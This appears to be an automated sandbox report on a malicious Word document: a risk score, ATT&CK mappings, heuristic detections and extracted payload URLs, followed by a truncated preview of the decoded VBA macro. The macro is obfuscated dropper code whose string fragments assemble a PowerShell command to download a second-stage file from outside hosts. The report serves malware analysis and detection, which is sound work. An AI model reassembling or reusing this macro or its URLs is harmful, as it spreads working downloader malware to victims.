MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, indicating an attempt to execute external commands. The reconstructed URL 'ellawhiteUPB+UPBheart.comUPB+UPB/4ngUPB+UPBgUPB+UPBo/,lJPET' is likely part of a command to download and execute a secondary payload. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' further supports its malicious nature as a dropper or phishing lure.
Heuristics 7
-
ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ellawhiteUPB+UPBheart.comUPB+UPB/4ngUPB+UPBgUPB+UPBo/,lJPET� In document text (OLE body)
- http://ellawhiteUPB+UPBheart.comUPB+UPB/4ngUPB+UPBgUPB+UPBo/,lJPETIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 75594 bytes |
SHA-256: 2139b615bcde0b6bf91903bc85fb03b9ac81cab793f1d0e91a7518eeb6a388db |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "FHvIjzsOFq"
Function VmtzoboV()
iMzwiYpdk = UCase("FtcaqmViZXYcz" + "jTOADiA" + "oTfFoIpru" + "aWDojbTYooFauC" + "azzpRRtnqFIu") + UCase("zMpiccCcBvnm" + "fuLIOZdTOIsC" + "ijjNjXhibbz" + "wRAJYDJClm" + "bhrjQRiDwjzwVs")
BTjYU = Mid("vlwAr]124 -rEplaCe ([cHAr]105+[cHAr]119+[cHAr]57),[cHAr]39)|.( $ShELliD[1]+$sh9TzhjjrCsK2", 4, 76)
mHwuTrVI = UCase("KwNYRitWjNif" + "CKGSVFjiboCdWh" + "DCfNXuV" + "VlOtwOrzXSIPYn" + "RVDAiIKvuBtTd") + UCase("UHzjPljGMkUk" + "fKOScQLOrTumm" + "qUrFuNQD" + "IiICKKJT" + "wSikfjQDSUc")
qTKWsjilfm = UCase("MPFzDSLlPIdJq" + "izrshIf" + "oQRsXDrwTfRjq" + "znijPwbbnHswOj" + "GokJUboj") + UCase("uIuRpwsG" + "pBDJAsjQN" + "JAZpKqMqjaW" + "IGXlGBKlp" + "ljYfEwnrZ")
oNwkTSAz = UCase("iZHbZVTomioMJD" + "oWFDXILOOD" + "SbIkfjClZFa" + "uuFQcBuAkvFs" + "MiSkWKt") + UCase("zCrfCCIKYd" + "NpKISsiMT" + "rXVPhSB" + "ADvhIzsNkazm" + "MRmfNCWAsnzZW")
lnimzab = Mid("SOjNRqYt+UE5SfVsnZauYGR0qlB4TbPcb", 9, 2)
UHJVHWZcYi = UCase("OLXLVTj" + "cHLjsXswmPl" + "GbntOpQfmQDo" + "SDwjLQn" + "jJiDErBmH") + UCase("YGrznYiw" + "DEoLDWfZTvN" + "wwPXRFpJzOs" + "HfiJUQYFPkj" + "uwihZRiq")
YaLfYVVXCTp = UCase("fWPVjGa" + "aXjjMPEHIN" + "MfGikTPiiIPz" + "msMrUFPj" + "oqOzjqGvl") + UCase("ksKaYnfBUbr" + "LaYuUDNmC" + "AwqPTlmZXnWkNP" + "RnDpDvEXYfo" + "lWDhwcmrNkJ")
NWQAoEU = UCase("jHEQwquIiFffp" + "tfmavPKTlblV" + "KdriMKTt" + "MCMutZk" + "YQLknTwGzUhNW") + UCase("fdjjimXTVVq" + "TjNAVlisCVJZW" + "vbOqmfii" + "iNKuwUFvpt" + "AMszwwfibJTGMU")
pVLmtHuOloQ = Mid("VYme[30]+UPBXUPB) ( ((UPBeUPB+UPBC7franc = UPB+U9MMtOF7aZzfCT2wcdf4rJcuMRbG3", 3, 46)
fpbQtcY = UCase("uPuDEsbNIS" + "PKwwCwZ" + "kfKADUFYH" + "XOhijvoAASj" + "aSSToXC") + UCase("jvoSZojOrjz" + "TmkEVkaBKC" + "GlfErhjfiWdrca" + "FuLaJQTLk" + "hOwEwAThzihtk")
mUSjn = UCase("wEijKNkLfnLrk" + "wZUfbJjiRr" + "AzHNOGzZHXAQG" + "iPBNJmFuGijz" + "lLHOnntKNcz") + UCase("jORcAvJNw" + "thUHFkGtddPfL" + "AJNdMYUmD" + "dYnRGjaldsRZuj" + "IEUzTAADDbqi")
BbZbkGQaz = UCase("IkuzEsCvfsbF" + "mJUMucwHWCaTjE" + "EawfLJKYSIaJk" + "oswkGLwROF" + "fflhUfVnNrFtvu") + UCase("clCDTSMihJdj" + "ttmLsmfiYqw" + "FVWhiwBpTiL" + "KlbTzDXqv" + "uUEtAJOIEuEaO")
TVium = Mid("t ((' (iw9&( 5vYPshOmE[21]+5vYPshOimFaKqsjUCWMMfHj7TOmu9", 2, 33)
uizsvLnTT = UCase("BXYGiWdhzon" + "DdBSwbOjvEUznj" + "dUjqPAukGUKvXC" + "KQhFQXw" + "HAbCkzDYTuZA") + UCase("OzXtIsvw" + "jqdutEShTZij" + "pnwJnDvqAwC" + "wSJMHfCmUTkYq" + "wFmazWc")
ajzhQCuvz = UCase("pAzLctILiXAHKM" + "USHhMbCcowrb" + "dQKkXidw" + "MOBjjlh" + "twBakbwsBVnXK") + UCase("kRzhRMPj" + "jlPFtjdsQvv" + "salspOs" + "IqYtAdjmBU" + "dJSSpVVDLY")
BtFGdApCjCY = UCase("nzzsFQZAz" + "TKiLvHjVVzUb" + "EPANHAiWwuQf" + "MDcSoiDS" + "wTzOIdAbotMOsd") + UCase("CSzRJVP" + "jmvdsCIpX" + "LQhQtsFWX" + "WSvTZYQ" + "fmIYiBRcNz")
ELfnLk = Mid("wlrp2YiwRrwZPB'+'+UPB,http:iw9+iw9//tsimtUPB+UPBsumUPB+UPiw9+iw9B.eUPB+UPBu/3GrPU0zDslQhwzztDvh0TFI", 13, 69)
UMjVjHb = UCase("WcPIsrMocwX" + "XtMVFPwrq" + "aRuZIvXTKjzfTw" + "slsaNrWFvvY" + "zPnOjnaBzNS") + UCase("QQJnrQrZPrNi" + "RdEELzi" + "SXDXRQstvjiS" + "JwiiOiDw" + "ICJKPJWwm")
FQrjkCOpFMj = UCase("YfEpwhNX" + "ZHLnwJvNqcDU" + "nKkKmifzQfFO" + "aSdzlMAiwXbUZY" + "Dlkvnmst") + UCase("lvismIb" + "Zzjcjrr" + "UIqmJpMJYvfuK" + "MhYZNqhHrnv" + "vapiTttESd")
tTDWLoQzZ = UCase("FvTGvTZiojnkJw" + "lMdZucpSOjpV" + "NVYcNdKQ" + "GqzHGTwiCTDSM" + "UjsQPdFZF") + UCase("RQSKLXjoQtGmZm" + "WTjdWSqBCD" + "UMunmhkBqqAnTf" + "PBSNhHFutJVwj" + "aOPHPCTtdGZ")
ZQiZw = Mid("t84RbQY4oHPm+UPBn eC7bcd)UPB+UPB{tryUPB+UPiw9+iw9B{eC7frUPB+UPBaUPB+UPBncUPB+UPB.DoUPB'+'+UPBwnlUPB+UPBoadFiUPB+UPBlUPB+U'+'PBe(eCUPBiwbp4zOTcZBWdUDimT4HLV", 13, 123)
wfrHwGIz = UCase("HvwiVUq" + "hvwnBEKiBJM" + "DqnumUucm" + "FIijRiR" + "MnBKOazm") + UCase("aJOsuGNwQHBvA" + "OqhpqEVmjNt" + "ZPscNwAjUSXHLC" + "hBWPLLMmTh" + "HhSndBzzjzFn")
osNsMqXQLUm = U
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.